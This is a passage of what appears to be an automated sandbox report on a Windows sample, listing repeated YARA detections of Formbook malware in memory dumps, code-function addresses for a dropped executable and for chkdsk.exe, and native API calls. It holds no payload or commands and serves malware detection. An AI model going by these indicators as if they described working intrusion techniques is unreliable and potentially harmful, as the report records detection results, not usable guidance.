          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: inlaww321345.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B1890
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B9C12
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B96A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B7E88
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003BC3BD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003BA184
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003BB3F1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B9C12
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B96A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B1890
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B7E88
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003BC3BD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003BA184
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003BB3F1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D805
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041DA33
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041EB32
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041C3EA
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041ED64
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041DD0A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409E5E
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01684120
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166F900
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173E824
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A830
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01721002
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017328EC
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017320A8
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B090
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AB40
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0170CB4F
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01732B28
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017123E3
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172DBD2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017203DA
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169ABD8
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169EBB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169138B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171FA2B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017322AE
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01731D55
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01660D20
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01732D07
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167D5E0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017325DD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01692581
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D82
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172D466
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167841F
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01731FF1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173DFCE
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01686E30
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172D616
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01732EF7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B0D20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05481D55
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05482D07
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054825DD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CD5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547D466
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C841F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548DFCE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05481FF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053D6E30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547D616
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05482EF7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053D4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053BF900
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05471002
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548E824
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054828EC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CB090
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054820A8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05482B28
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053DAB40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EEBB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547DBD2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054703DA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0546FA2B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054822AE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D805
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098DA33
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098C3EA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098EB32
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00972D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00972D87
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098DD0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098ED64
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00979E5E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00979E60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00972FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 053BB150 appears 48 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: String function: 003B4599 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: String function: 0166B150 appears 136 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: String function: 003B2400 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A360 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A410 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A490 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A35A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A45A NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A492 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041A53A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016A98F0 NtReadVirtualMemory,LdrInitializeThunk,
